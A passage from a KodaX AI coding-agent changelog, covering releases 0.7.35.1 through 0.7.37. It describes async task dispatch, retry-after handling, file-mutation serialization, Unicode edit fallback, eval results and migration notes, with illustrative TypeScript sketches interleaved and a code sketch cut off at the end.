+ - `feature-146-c-unicode-edit-fallback-behavioral.eval.ts` — 5×10=50 cell LLM-judge eval (FEATURE_131-B follow-up)
+ - `feature-148-post-dispatch-probe.eval.ts` — multi-turn anti-immediate-await behavioral eval (FEATURE_148)
+ - **4 new dataset directories** under `benchmark/datasets/` — `prompt-overlay-position/`, `pattern-b-parallel-decision/`, `unicode-edit-fallback/`, `pattern-b-post-dispatch-probe/` (all version-tracked with cases.ts + README.md per FEATURE_104 v2 convention)
+ - **`packages/ai/src/providers/openai-usage-cache-fields.test.ts`** — 7 focused tests pinning the DeepSeek private-cache-field fallback chain (FEATURE_116-D).
+ - **First behavioral sweep total** for FEATURE_146: 135 LLM cells (60+25+50), cost ≈ $2.70, total wall-clock ~10 minutes when run serially. All three sweeps PASS pre-registered gates.
+ - **Per-test timeout bumps** on 4 flaky suites (worktree-runner / h2-boundary-runner / agent.provider-policy / sa-refactor-goldens — see Fixed section above) eliminate false-positive flakes under the full ~4800-test parallel run. 4848/4848 green in 107s on the full sweep.
+ - Build green; type-check clean; full test suite regression-clean against v0.7.36 baseline.
+
+ ### Migration notes
+
+ - **No breaking changes** for runtime users on the SA path or AMA path. FEATURE_116 cache_control markers are ignored by providers that don't honor them; FEATURE_141 is REPL-render-only and adds no new wire fields; FEATURE_146 is eval infrastructure with no runtime surface.
+ - **SDK consumers via `git clone + npm link`** must rename imports from `@kodax/*` to `@kodax-ai/*` (and `@kodax/ai` → `@kodax-ai/llm`) — the migration sed helper is documented in `docs/features/v0.7.37.md` § FEATURE_147 Migration impact. CLI users (the dominant audience) see zero impact: `git clone + kodax help` continues to work, and after FEATURE_150 reships, `npm install -g @kodax-ai/cli` is the new install-by-name path (single bundle).
+ - **SDK consumers expecting `@kodax-ai/coding` / `@kodax-ai/agent` / etc. as separate npm packages**: those 9 packages are no longer published to npm under FEATURE_150. The two supported integration paths are now: (path A) `git clone + npm link/file: + bundle your own product with esbuild` (recommended for SDK integrators — KodaX's own monorepo workflow is the same shape); (path B) `npm install @kodax-ai/cli + import { runKodaX, ... } from '@kodax-ai/cli'` (the bundled root re-exports SDK API via `package.json#exports`; binds your SDK upgrades to CLI version cadence — acceptable for small integrations). See HLD §12.2 for the integration-path table.
+ - **Behavioral eval gates as continuous quality regression**: the 3 new FEATURE_146 eval files run on demand (skip when API keys absent) and become the load-bearing v0.7.37+ regression guard for the v0.7.36 LLM-facing changes. Re-run triggers are documented in each dataset README.
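
For the scope rename in the migration notes above, the mapping of import specifiers can be sketched as a small function. This is not the sed helper from the design doc: `renameScope` is a hypothetical name, and the handling of subpath imports (for example `@kodax/ai/...`) is an assumption made for this example.

```typescript
// Hypothetical sketch of the specifier mapping; not the documented sed helper.
// Subpath handling is an assumption.
function renameScope(specifier: string): string {
  const oldAi = "@kodax/ai";
  // Special case first: @kodax/ai becomes @kodax-ai/llm (not @kodax-ai/ai).
  if (specifier === oldAi || specifier.startsWith(oldAi + "/")) {
    return "@kodax-ai/llm" + specifier.slice(oldAi.length);
  }
  // General case: @kodax/<pkg> becomes @kodax-ai/<pkg>.
  const oldScope = "@kodax/";
  if (specifier.startsWith(oldScope)) {
    return "@kodax-ai/" + specifier.slice(oldScope.length);
  }
  // Anything else (third-party or already-migrated imports) is left untouched.
  return specifier;
}
```

The `@kodax/ai` case is checked before the general scope rule so that it is not rewritten to `@kodax-ai/ai`.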
+
+ ### Quality gate posture (honest)
+
+ v0.7.36 shipped with structural eval + dataset regression (no API keys) for the three LLM-facing changes (FEATURE_119 / FEATURE_131-B / FEATURE_143) and explicitly tracked the LLM-judge multi-alias behavioral eval as `FEATURE_146` for v0.7.37. **v0.7.37 closes that gap**: 135 cells across 3 sweeps × 5 production aliases (zhipu/glm51, kimi, mmx/m27, ds/v4pro, ds/v4flash); all three sweeps PASS pre-registered ship gates with margin (FEATURE_146-A B-section actually outperformed legacy on the hardest task; FEATURE_146-B trigger rate 76-88% vs 60% gate; FEATURE_146-C false-positive=0 + parity match rate). The behavioral validation that was deferred at v0.7.36 ship is **explicitly load-bearing for v0.7.37**.
+
+ ---
+
+ ## [0.7.36] - 2026-05-07
+
+ ### Theme
+
+ **Six-feature delivery — async dispatch (Pattern B), provider Retry-After + exponential backoff, file-mutation queue + Unicode normalization, Skill UX + prompt-overlay misplacement fix, AMA Harness V2 foundation, Message Queue.** Every feature originally scoped for v0.7.36 ships in this release — nothing is deferred. Two of the six (FEATURE_114 V2 single-loop runner, FEATURE_115 mid-turn drain UX-polish) ship as foundation surfaces gated behind `KODAX_HARNESS_V2` (default-off) and the existing `KODAX_ASYNC_DISPATCH=0` escape hatch, so the on-by-default behavior is byte-equivalent to v0.7.35.1 for the SA path and additive for AMA. Net: 14 commits across 9 packages (12 feature commits + 2 release-ops); 3683 unit tests + 26 eval/regression tests passing; build green on Windows + POSIX.
+
+ ### Added
+
+ - **FEATURE_115 — Message Queue foundation + mid-turn drain** (commits `5294e6b`, `ebb46de`, `a4bccca`, `d33b5d1`, `a76097e`) — Two-tier MessageQueue (`user` priority + `background` priority) with agent-id routing in `@kodax/agent`, fed by REPL `pendingInputs` (1B mirror), drained mid-turn at runner-driven yield points (1C), with a documented FEATURE_111-absorbed soft-pause UX (1D) and a child task-notification helper that lets dispatched children surface settle events back into the parent's MessageQueue without blocking the parent's tool loop (1E). Pre-existing `@kodax/agent ↔ @kodax/session-lineage` build cycle fixed in 1A as part of the foundation work. Mid-turn drain is currently gated to runner-driven AMA only — SA path unchanged. The queue is the substrate FEATURE_119's async dispatch (Phase 2A) and FEATURE_130's retry-after notifications (Phase 2B) ride on top of.
+ - **FEATURE_119 — Pattern B async dispatch** (commit `ebdf58f`) — `dispatch_child_task` and `await_child_task` are now separate tools. Sync path retained as `KODAX_ASYNC_DISPATCH=0` escape hatch; default async path launches the executor without awaiting, registers the in-flight handle in `ctx.childTaskRegistry` (substrate-level, shared between SA + AMA paths), fires `enqueueChildTaskNotification` on settle, and returns a `task_id:<id>` banner so the parent can decide when to await. `await_child_task` is the regular awaiter, registers worktree finalization, deletes the registry entry on completion, and surfaces live status via `ctx.reportToolProgress`. Wired into Scout/Generator role tool sets only (Planner/Evaluator do not dispatch children). Excluded from child-executor's tool set (children cannot recursively dispatch). 10 behavioral tests in `tools/async-dispatch.test.ts`.
+ - **FEATURE_130 — Provider Retry-After + Exponential Backoff** (commit `9139852`) — All 12 provider adapters (Anthropic, OpenAI, DeepSeek, Kimi, Qwen, Zhipu, MiniMax, MiMo, Gemini CLI, Codex CLI, …) now honor 429/503/529 `Retry-After` headers across 4 forms: integer-seconds, HTTP-date, `retry-after-ms`, and exponential-backoff fallback when no header is present. Helper `parseRetryAfter` + `extractHeadersFromError` lives in `@kodax/ai/retry/retry-after.ts` and is consumed centrally in `withRateLimit` so every `KodaXBaseProvider` subclass inherits the behavior without per-adapter wiring. `withRateLimit` accepts an optional `onRetryAfter` callback that fires before the retry sleep with `{ provider, attempt, maxAttempts, waitMs, source: 'header' | 'backoff' }`. `KodaXProviderStreamOptions.onRetryAfter`, `KodaXEvents.onRetryAfter`, and a new `recordRetry`/`RetryRecord` cost-tracker channel propagate the event through `run-substrate.ts`, `stream-handler-wiring.ts`, and into the Ink REPL surface as `[Rate limited] (provider) — retrying in Xs [source] (attempt/max)`. Cost report now appends a "Retries: N (Ys total wait)" line. `isRateLimitError` keyword set extended with `overload`/`overwhelmed`/`503`/`529`/`busy`. 22 unit tests in `retry-after.test.ts` cover all 4 forms, Headers API extraction, clamping, jitter, and concurrent-safety.
+ - **FEATURE_131 — File Mutation Queue + Edit Unicode Normalization** (commit `190356a`) — `withFileMutation` (path-keyed serialization) at `tools/_internal/file-mutation-queue.ts` wraps `edit` / `multi-edit` / `write` / `insert-after-anchor` so concurrent mutations to the same file serialize through a single in-process queue while different files proceed in parallel. `normalizePathForKey` is platform-aware: Windows lowercases the entire path (NTFS is case-insensitive); POSIX preserves component case but normalizes separators. `KODAX_PATH_KEY_PLATFORM` env override exposed for hermetic tests. Edit / multi-edit / insert-after-anchor add a Unicode-normalized fallback before the legacy `NOT_FOUND` error: `normalizeForFuzzyMatch` runs NFKC, maps smart quotes (`""''`) to ASCII, em-dash (`—`) to `--`, en-dash (`–`) to `-`, non-breaking space + ideographic space to regular space — closing the most common LLM-needle vs file-haystack drift. Cross-process content-hash safety (FEATURE_125) explicitly stays in v0.7.41. 16 + 14 unit tests across `file-mutation-queue.test.ts` and `edit-unicode-normalize.test.ts`.
+ - **FEATURE_143 — Skill UX hardening + prompt-overlay position migration** (commits `29e5639`, `68be923`) — Two coupled deliverables. (1) **Skill UX**: `getSystemPromptSnippet()` in `@kodax/skills` now leads with a "BLOCKING REQUIREMENT: invoke the relevant Skill tool BEFORE generating any other response" directive so the LLM treats `/skill:<name>` as a load-bearing gate, not a hint. The classic readline REPL gains the same skills-prompt that the Ink REPL has had since v0.7.30. New `parseInlineSkillReferences` helper in `repl/interactive/commands.ts` recognizes inline `/skill:<name>` references mid-message (regex `/(^|\s)\/skill:([\w][\w.\-:]*)/g`, skips leading slash references which still go through `parseCommand`). (2) **prompt-overlay misplacement fix**: FEATURE_084 (v0.7.26) stitched the AMA `plan.promptOverlay` (routing notes block: task-family guidance, work intent, brainstorm directives, provider-policy notes, explicit-reason trail) onto the user-prompt head in `runner-driven.ts`. The Worker received the bytes but read them as user input rather than platform truth — semantic drift vs the SA path's `capability-sections.ts` system-prompt injection. v0.7.36 routes the same string through `ManagedRolePromptContext.promptOverlay` so it lands as a system-prompt section, matching SA-path behavior across all 4 AMA roles (Scout / Planner / Generator / Evaluator). `runner-driven.ts:promptWithOverlay` now returns the bare `prompt` argument unmodified — bytes-only-once invariant pinned by a structural eval. 7 commands-parse tests + 3 structural eval tests in `tests/prompt-overlay-position-migration.eval.ts`.
203
+ - **FEATURE_114 — AMA Harness V2 foundation** (commit `75a3853`) — Foundation surfaces shipped behind `KODAX_HARNESS_V2` env flag (default-off, case-insensitive `'true'` only). New `PLANNED` harness profile across `@kodax/ai` (`KodaXHarnessProfile`), `@kodax/coding` (reasoning, budget, max-rounds tables — `200` budget cap, `8` max rounds), and the runner-driven harness tier order. New `runDeterministicEvaluator` helper at `task-engine/deterministic-evaluator.ts` spawns `build` / `test` / `lint` commands with default 90s timeout and returns `pass | fail | skipped | error` with stderr/stdout tails. Recognizes "Missing script" / "command not found" as `skipped` (not error). New `RunnerNudgeState` + `observeToolCall` + `maybeAppendPlanNudge` at `task-engine/runner-nudges.ts` — once-only emission after 5 read-tool calls (read/grep/glob/code_search/semantic_lookup) without a plan, threshold configurable. New `planBeforeMutate` warn-severity invariant at `agent-runtime/invariants/plan-before-mutate.ts` — gates on `recorder.todoUpdateCount === 0 && !recorder.workerTrivialDeclaration`, no-ops when fields absent so V1 path is unaffected. Coding-side invariant chain now ships 9 ids (was 8): the V2 `planBeforeMutate` coexists with V1's `harnessSelectionTiming` during the migration window. New `worker-role-prompt.ts` builder with PLAN-FIRST CONTRACT + SCOPE COMMITMENT + MUTATION DISCIPLINE + DISPATCH RULE A/B/C + Pattern B + EVALUATOR HANDOFF sections. Full V2 single-loop runner-driven path (Worker = Scout+Planner+Generator merge, Evaluator preserved as structural gate) lands in v0.7.37. 9 + 7 + 12 unit tests across `runner-nudges.test.ts` / `deterministic-evaluator.test.ts` / `worker-role-prompt.test.ts`. Existing 8-invariant assertions in `index.test.ts` and `feature-101-106-joint.test.ts` updated to expect 9.
204
+ - **`tests/prompt-overlay-position-migration.eval.ts` structural ship gate** (commit `68be923`) — 3 hermetic tests (no API keys) covering migration completeness across all 4 AMA roles, no-regression when overlay absent, and whitespace-only overlay treated as absent.
205
+ - **`tests/feature-119-pattern-b-async-dispatch.eval.ts` structural ship gate** — 9 hermetic tests covering the launch+await tool surface (both `dispatch_child_task` AND `await_child_task` registered), description load-bearing content (LLM gets WHEN-TO-USE / parallel-dispatch / `task_id:<id>` banner / background-notification anchors), Worker V2 prompt Pattern B integration, and default-on policy with `KODAX_ASYNC_DISPATCH=0` escape hatch.
206
+ - **`tests/feature-131-unicode-dataset-regression.eval.ts` dataset regression** — 12 representative needle/haystack pairs reconstructed from real-world LLM silent-edit-fail cases (smart quotes, em-dash where file has `--`, en-dash where file has `-`, nbsp, ideographic space, full-width Latin via NFKC, combined-artifact "real-world cocktail"), each asserting the legacy byte-exact fallback MISSES + the Unicode-normalized fallback finds a UNIQUE match. 2 true-negative cases guard against over-broad normalization (e.g. NFKC must not lowercase identifiers).
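The Unicode-normalized fallback from FEATURE_131 can be pictured with a minimal sketch. It assumes only the mapping listed in that entry (NFKC, smart quotes, em-dash, en-dash, non-breaking and ideographic space). The function names ending in `Sketch`, the `MatchKind` type, and the "unique hit only" policy wiring are illustrative assumptions, not the actual KodaX source.

```typescript
// Illustrative only: mirrors the mapping listed in the changelog entry,
// not the real `normalizeForFuzzyMatch` implementation.
function normalizeForFuzzyMatchSketch(text: string): string {
  return text
    .normalize("NFKC") // folds full-width Latin and compatibility spaces
    .replace(/[\u201C\u201D]/g, '"') // curly double quotes -> ASCII
    .replace(/[\u2018\u2019]/g, "'") // curly single quotes -> ASCII
    .replace(/\u2014/g, "--") // em-dash -> two hyphens
    .replace(/\u2013/g, "-") // en-dash -> one hyphen
    .replace(/[\u00A0\u3000]/g, " "); // explicit space mapping, redundant after NFKC
}

type MatchKind = "exact" | "normalized" | "ambiguous" | "not_found";

// Counts non-overlapping occurrences of `needle` in `haystack`.
function countOccurrences(haystack: string, needle: string): number {
  if (needle.length === 0) return 0;
  let count = 0;
  let index = haystack.indexOf(needle);
  while (index !== -1) {
    count += 1;
    index = haystack.indexOf(needle, index + needle.length);
  }
  return count;
}

// Byte-exact lookup runs first; the normalized pass is only a fallback and
// only accepts a unique hit (assumed policy, based on the regression notes).
function locateNeedleSketch(haystack: string, needle: string): MatchKind {
  if (countOccurrences(haystack, needle) > 0) return "exact";
  const hits = countOccurrences(
    normalizeForFuzzyMatchSketch(haystack),
    normalizeForFuzzyMatchSketch(needle),
  );
  if (hits === 1) return "normalized";
  return hits === 0 ? "not_found" : "ambiguous";
}
```

Because NFKC does not change letter case, a needle that differs from the file only by identifier casing still falls through to `not_found`, which is the property the true-negative cases guard.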
207
+
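The inline `/skill:<name>` recognition from FEATURE_143 can be sketched around the regex quoted in that entry. The pattern is taken verbatim from the changelog. The surrounding function, the de-duplication, and the reading of "skips leading slash references" as "ignore a match at position 0" are assumptions made for illustration.

```typescript
// Pattern quoted from the changelog entry; the rest is a hypothetical sketch,
// not the real `parseInlineSkillReferences`.
const INLINE_SKILL_PATTERN = /(^|\s)\/skill:([\w][\w.\-:]*)/g;

function parseInlineSkillReferencesSketch(message: string): string[] {
  const names: string[] = [];
  // Fresh RegExp per call so `lastIndex` state never leaks between calls.
  const pattern = new RegExp(INLINE_SKILL_PATTERN.source, "g");
  let match = pattern.exec(message);
  while (match !== null) {
    // Assumption: a reference at the very start of the message is a slash
    // command and is left to the regular command parser.
    const isLeading = match.index === 0 && match[1] === "";
    const name = match[2];
    if (!isLeading && names.indexOf(name) === -1) names.push(name);
    match = pattern.exec(message);
  }
  return names;
}
```

Note that the character class includes `.`, so a reference followed directly by sentence punctuation would capture the trailing dot; callers of a helper like this may want to trim it.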
208
+ ### Tested
209
+
210
+ - **Cumulative test surface this release**: 3683 tests passing (coding 2097, repl 1056, ai 219, skills 18, agent contributions); plus 3 + 9 + 14 = 26 new eval/regression tests under `tests/*.eval.ts`. Build green; type-check clean; full regression run on Windows.
211
+
212
+ ### Quality gate posture (honest)
213
+
214
+ The v0.7.36 design doc originally specified a **multi-alias × multi-task LLM-judge behavioral eval** for FEATURE_143 (96 cells across 8 alias × 6 task × 2 prompt variant) as the load-bearing ship gate, implicitly applicable to FEATURE_119 (parallel-dispatch decision quality, ~20 cells) and FEATURE_131-B (real LLM rollout silent-edit-fail rate, ~60 cells) too — the LLM-rollout-level gold standard. What this release ships instead:
215
+
216
+ - **Three LLM-facing changes** (FEATURE_119 / FEATURE_131-B / FEATURE_143) ship with **structural eval + dataset regression** as the on-CI ship gate (no API keys, no LLM judge, runs deterministically).
217
+ - **The 176-cell multi-alias LLM-judge sweep** (~$30 budget across 8 provider aliases) is **formally tracked** as `FEATURE_146` in [docs/features/v0.7.37.md § v0.7.36 Behavioral Eval Follow-ups](docs/features/v0.7.37.md#v0736-behavioral-eval-follow-ups正式-track非隐式-defer) — a real planned line item with scope, gates, datasets, and rollback policy. `docs/FEATURE_LIST.md` registers FEATURE_146 against the v0.7.37 slot. **This is not an implicit "we'll get to it eventually" — it is a load-bearing v0.7.37 quality gate.**
218
+ - **Risk being explicitly accepted**: production rollouts of v0.7.36 may surface a behavioral regression that the structural gate cannot see (e.g. a model decides to await immediately after dispatch, defeating Pattern B; or post-migration prompt-overlay shifts H0/H1/H2 routing distributions). **Mitigation**: FEATURE_146 ships in v0.7.37 (next release); any sub-eval failure triggers an independent patch release (e.g. `0.7.37.1`) without blocking the v0.7.37 main line (FEATURE_116 / FEATURE_141).
219
+
220
+ ### Migration notes
221
+
222
+ - **No breaking changes** for SA-path users — `KODAX_HARNESS_V2` defaults off, `KODAX_ASYNC_DISPATCH` defaults on (Pattern B is the new default but the runtime degrades gracefully via the registered `await_child_task` tool); existing scripts work unchanged.
223
+ - **AMA-path users** see a behavior fix: `plan.promptOverlay` bytes are now read by Workers as system-prompt context rather than user input. This is a *correctness* migration, not a semantic break — Workers behave more correctly post-FEATURE_143.
224
+ - **SDK consumers calling `@kodax/ai` providers directly**: the new `KodaXProviderStreamOptions.onRetryAfter` callback is optional. Existing call sites that don't set it are unaffected; the cost tracker still records `RetryRecord`s through the substrate for any consumer using `@kodax/coding`'s run loop.
225
+ - **SDK consumers calling `@kodax/coding` tools directly**: `edit` / `multi-edit` / `write` / `insert-after-anchor` are now serialized per file path within the same process. Cross-process serialization (FEATURE_125) ships in v0.7.41.
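For SDK consumers wondering what "serialized per file path within the same process" means in practice, here is a minimal sketch of a path-keyed promise queue. It is written from the changelog description only: `withFileMutationSketch`, `normalizePathForKeySketch`, and the `tails` map are hypothetical names, and the separator handling on POSIX is an assumption.

```typescript
// One promise "tail" per path key; new work chains onto the current tail.
const tails = new Map<string, Promise<void>>();

// Assumed key rules: Windows lowercases the whole path, POSIX keeps case;
// both unify separators. The real helper may differ.
function normalizePathForKeySketch(filePath: string, platform: "win32" | "posix"): string {
  const unified = filePath.replace(/\\/g, "/");
  return platform === "win32" ? unified.toLowerCase() : unified;
}

async function withFileMutationSketch<T>(key: string, task: () => Promise<T>): Promise<T> {
  const previous = tails.get(key) ?? Promise.resolve();
  // Start only after every earlier mutation on the same key has settled.
  const run = previous.then(task);
  // The stored tail never rejects, so one failed edit cannot poison the queue.
  const tail = run.then(
    () => undefined,
    () => undefined,
  );
  tails.set(key, tail);
  try {
    return await run;
  } finally {
    // Drop the entry once this was the last queued mutation for the key.
    if (tails.get(key) === tail) tails.delete(key);
  }
}
```

Two calls with the same key run strictly one after the other, while calls with different keys overlap freely. Nothing here protects against a second process touching the same file, which matches the note that cross-process safety is a separate feature.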
226
+
227
+ ---
228
+
229
+ ## [0.7.35.1] - 2026-05-07
230
+
231
+ > **Milestone tag, not a published release** — `package.json` versions remain at `0.7.35` (4-segment `0.7.35.1` is invalid semver and would be rejected by `npm publish`). The `0.7.35.1` git tag marks this checkpoint; the work below ships under npm version **`0.7.36`** alongside `FEATURE_143`.
232
+
233
+ ### Theme
234
+
235
+ **Structural cleanup patch + AMA worker capability parity fix** — fixes FEATURE_082 (v0.7.24) package-boundary drift, tames 13 hardcoded `~/.kodax/` callsites, AND closes the v0.7.26 FEATURE_084 capability-context bypass that left AMA workers blind to MCP servers / skills / project AGENTS.md / git status / project tree. All changes are byte-equivalent on the existing SA coding path; the **non-coding** consumers of `@kodax/session-lineage` see a behavior delta (a neutral default compaction prompt — empirically validated by a 150-cell prompt eval), and the **AMA path** sees a behavior fix (workers now receive the same 6 capability sections SA workers always saw).
236
+
237
+ ### Refactored
238
+
239
+ - **FEATURE_142 B-R1 — two-layer split for compaction summary prompt** (commits `106c63c` + `a00ed30` hotfix) — `@kodax/session-lineage`'s built-in `SUMMARY_PROMPT` / `UPDATE_SUMMARY_PROMPT` were coding-flavored ("another coding agent", "EXACT file paths, function names", "## Files & Changes" schema, 401-on-/api/auth/login example), violating ADR-021's rule that the generic compaction primitive package must not enumerate coding-specific terminology. Split into two layers: (1) `@kodax/session-lineage` ships neutral `DEFAULT_SUMMARY_PROMPT` / `DEFAULT_UPDATE_SUMMARY_PROMPT` (the candidate-a-conservative winner from a 150-cell prompt eval — 3 candidates × 10 fixtures × 5 aliases at `tests/compaction-prompt.eval.ts`); (2) `@kodax/coding` ships verbatim v0.7.35 `CODING_SUMMARY_PROMPT` / `CODING_UPDATE_SUMMARY_PROMPT`, SHA-locked at `470cb93…` / `86fadb9…` against the v0.7.35 release tree. Three coding callers (`compaction-orchestration.ts` CAP-060, `repl/.../commands.ts` manual `/compact`, and `task-engine/_internal/managed-task/compaction.ts` Runner-driven AMA — the third was missed in the original commit and caught by code review, hence the hotfix) explicitly pass `CODING_*_PROMPT` to preserve byte-equivalent v0.7.35 behavior on every coding path. Caller routing pinned by both a runtime mock (`tryIntelligentCompact` args[7] / args[8]) and a source-level audit (regex match for `CODING_SUMMARY_PROMPT,\s*CODING_UPDATE_SUMMARY_PROMPT` adjacency). Eval finding worth recording: the coding-flavored baseline empirically *outperforms* both neutral candidates on **non-coding** recall too (97.0% vs 93.2% / 92.3%) — coding-flavored wording generalizes well; the split is for architectural correctness, not measured behavior. Generic / non-coding consumers of `@kodax/session-lineage` accept a 2-3pt non-coding-recall regression as the cost of clean layer boundaries.
240
+
241
+ - **FEATURE_142 Batch D — uplift 4 substrate middleware to `@kodax/agent/runtime-middleware/`** (commit `12a2b55`) — Per the audit-narrowed Batch D scope, only modules with pure `@kodax/ai` + `@kodax/session-lineage` deps are uplifted: `compaction-trigger.ts` (`shouldCompact`), `compaction-fallback.ts` (`gracefulCompactDegradation`), `context-window.ts` (`resolveContextWindow` / `DEFAULT_CONTEXT_WINDOW`), `history-cleanup.ts` (`cleanupIncompleteToolCalls` / `validateAndFixToolHistory`). `boundary-tracker-session.ts` was originally listed in the doc but turned out to depend on `@kodax/coding/src/resilience/` (audit miss caught at implementation time) — uplifting it would create an `@kodax/agent → @kodax/coding` cycle, so it stays in coding. Coding-side re-exports preserve every existing import path; SDK consumers via `@kodax/coding`'s barrel see no API break. Two contract-test mock targets (`vi.mock('../compaction-fallback.js', ...)` etc.) shifted to `vi.mock('@kodax/agent', ...)` with `importOriginal` spread so other agent exports stay live.
242
+
243
+ - **FEATURE_142 Batch E — extract capability-sections helper for SA-path dedup** (commit `4018077`) — The 13 capability-context prompt sections previously inlined in `buildSystemPromptSnapshot` (`builder.ts:32-181`) are now hoisted into `buildCapabilityContextSections` at `packages/coding/src/prompts/capability-sections.ts`. SA path (the `runKodaX` direct-call flow) keeps responsibility for cwd resolution + final snapshot assembly; section construction is now a single-function call. SA output is byte-equivalent — `builder.test.ts`'s 11 existing tests are the integration-level guard, plus 6 new unit tests pin canonical id ordering + conditional inclusion in the helper. AMA worker (`role-prompt.ts`) is intentionally NOT wired in this batch; that's `FEATURE_144`, shipped in commit `79c3dbd` under the same milestone (see Fixed section below). The helper lives in `coding/prompts/` rather than `@kodax/agent/` because consumption is coding-internal (a future `@kodax/data-analysis-agent` would have its own builder + role-prompt with its own section set — `prompt-overlay` is coding-routing-specific) and hoisting would force `@kodax/agent → @kodax/skills` / `@kodax/mcp` cross-package deps, breaking the "agent doesn't depend on application packages" promise.
244
+
245
+ ### Added
246
+
247
+ - **FEATURE_145 — agent-home 3-tier resolution helper** (commit `ed7c17d`) — Centralizes 13 hardcoded `path.join(homedir(), '.kodax', ...)` callsites across `@kodax/coding` (3), `@kodax/mcp` (2), `@kodax/repl` (7), `@kodax/session-lineage` (1) into a single `getAgentConfigPath(...)` resolver at `@kodax/agent/runtime/agent-home.ts`. Three-tier priority: (1) programmatic override via `setAgentConfigHome(path)` for substrate-consumer agents (`@kodax/ops-agent` etc.) to redirect at boot; (2) `KODAX_HOME` env var; (3) `~/.kodax/` default. With override unset and env unset, the resolver returns the same byte sequence as the prior hardcoded calls — byte-equivalent for the existing user base. Process-level singleton (not per-call DI) chosen because the callsites are buried in library helpers and threading `configHome` through 30+ helper signatures would invite silent fallbacks on miss. Two callsites intentionally NOT migrated: `@kodax/ai/src/reasoning-overrides.ts` (would create `@kodax/ai → @kodax/agent` dependency cycle; existing inline `process.env.KODAX_HOME ??` already honors the env tier), and `@kodax/skills/src/types.ts:255` (zero-dep-package policy). Project-relative `.kodax/` paths and CWD-relative `path.join('.kodax', 'constructed', ...)` constants are untouched — those name a different concept (per-project config) and use a different root.
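The three-tier priority described for FEATURE_145 can be sketched as follows. The tier order and the `KODAX_HOME` variable come from the entry above. The `Sketch`-suffixed function names, the injectable `env` parameter, and the treatment of an empty `KODAX_HOME` as unset are assumptions for illustration, not the real `@kodax/agent` API.

```typescript
import { homedir } from "node:os";
import * as path from "node:path";

// Process-level override slot (tier 1). Hypothetical sketch, not KodaX source.
let overrideHome: string | undefined;

function setAgentConfigHomeSketch(dir: string | undefined): void {
  overrideHome = dir;
}

function getAgentConfigPathSketch(
  segments: readonly string[],
  env: Record<string, string | undefined> = process.env,
): string {
  const root =
    overrideHome ?? // tier 1: programmatic override
    (env.KODAX_HOME || undefined) ?? // tier 2: env var (empty string treated as unset)
    path.join(homedir(), ".kodax"); // tier 3: default location
  return path.join(root, ...segments);
}
```

Because the override lives in module state, any value that is computed from the resolver at import time is frozen before a later `setAgentConfigHomeSketch` call can affect it. That is the same ordering hazard the post-Batch-E review fixes document for the REPL's load-time constants.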
248
+
249
+ ### Fixed
250
+
251
+ - **FEATURE_144 — AMA worker capability context parity** (commit `79c3dbd`) — Closes the v0.7.26 FEATURE_084 latent bug where the AMA Runner-driven migration silently dropped 6 of the 13 SA-path capability-context sections from worker prompts: `mcp-capability-context` (active MCP server visibility), `skills-addendum` (skill-specific guidance), `project-agents` (AGENTS.md / CLAUDE.md project rules), `tool-construction` (tool self-construction guidance), `git-context` (branch / status snapshot), `project-snapshot` (lightweight repo tree). Three of these dropouts produced confirmed user-facing bugs (MCP servers invisible to Scout, skills invisible to workers, project CLAUDE.md rules ignored by Generator). `runner-driven.ts` now builds the SA path's capability sections ONCE per AMA entry via `buildCapabilityContextSections()`, filters out the 7 sections AMA-owned by other Runner channels (`workspaceSection` / `prebuiltRepoIntelligenceContext` / Shard 6d-L overlay stitching) so they don't duplicate, joins the remaining 6 into a string, and threads it through `ManagedRolePromptContext.capabilityContextBlock`. `role-prompt.ts` inserts the block right after `workspaceSection` in every role's section array (Scout / Planner / Generator / Evaluator), matching the SA-path adjacency between runtime truth and capability truth. Implementation simpler than the original design (no new public `KodaXContextOptions` fields, no `builder.ts` changes): SA path renders once per session so the per-worker FS-load concern is AMA-specific — a closure-local `prebuiltCapabilityContextBlock` in `runner-driven.ts` caches the result across all workers spawned from the same AMA entry, FS load upper bound stays at 1 per AMA entry regardless of worker count. Best-effort error handling — capability-build failures emit `[fea144:capability-context-build-failed]` resilience-debug events and let the worker fall back to legacy `workspaceSection`-only visibility (matching pre-FEATURE_144 behavior). 
Structural ship gate: 4 unit tests in `role-prompt.test.ts` (every role renders the block / positioned between workspace and decision summary / legacy callers unaffected / whitespace-only treated as absent) + 3 deterministic ship-gate cases in `tests/ama-worker-capability-parity.eval.ts` (filter retains 6 + drops 7 / all 4 roles render end-to-end with markers / legacy parity). The 4-dimension behavioral eval (instruction-following parity / `mcp_search` call rate / CLAUDE.md compliance / dirty-repo git declaration) requires a multi-provider judge harness build that exceeds patch scope and is tracked as a v0.7.36 follow-up.
252
+
253
+ - **Post-Batch-E review fixes** (commit `928ce59`) — Addresses 4 findings from the FEATURE_145 + Batch E code review: (HIGH-1) document load-time freeze of `KODAX_DIR` / `KODAX_SESSIONS_DIR` / `KODAX_CONFIG_FILE` in `repl/common/utils.ts` and `USER_CONFIG_FILE` in `repl/common/permission-config.ts` — these are public exports evaluated at module import; substrate consumers calling `setAgentConfigHome()` AFTER importing repl will see stale paths, so JSDoc warnings + an inline `storage.ts` reminder document the required ordering; (MEDIUM-1) `McpCapabilityProvider` captures `defaultMcpCacheDir()` once at construction and threads it into every spawned runtime — JSDoc warning documents the construction-time-capture semantics + escape hatch (explicit `options.cacheDir`); (LOW-2) `buildCapabilityContextSections()` previously required callers to pass `executionCwd`, creating a footgun where SA / future AMA paths could resolve cwd differently and drift — the parameter is now optional with internal `resolveExecutionCwd(options.context)` fallback; (BATCH-E-1) added byte-equivalence snapshot test asserting full rendered output structure stays stable post-extraction (normalizes cwd / basename / Node version / platform for cross-platform determinism, guards section ordering and content concatenation, not just metadata).
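The "build once per AMA entry, filter, cache, fall back on failure" flow described for FEATURE_144 might look roughly like the sketch below. The six section ids are the ones named in the entry. The `PromptSection` shape, the factory function, and the synchronous builder are simplifying assumptions; the real code path is likely asynchronous and wired through `runner-driven.ts`.

```typescript
interface PromptSection {
  id: string;
  text: string;
}

// The six ids the changelog lists as restored for AMA workers.
const AMA_FORWARDED_SECTION_IDS: ReadonlySet<string> = new Set([
  "mcp-capability-context",
  "skills-addendum",
  "project-agents",
  "tool-construction",
  "git-context",
  "project-snapshot",
]);

// Returns a getter that builds the block at most once and then reuses it for
// every worker spawned from the same entry (hypothetical helper).
function createCapabilityBlockProviderSketch(
  buildSections: () => PromptSection[],
  onBuildFailure: (error: unknown) => void,
): () => string | undefined {
  let attempted = false;
  let cached: string | undefined;
  return () => {
    if (attempted) return cached;
    attempted = true;
    try {
      const block = buildSections()
        .filter((section) => AMA_FORWARDED_SECTION_IDS.has(section.id))
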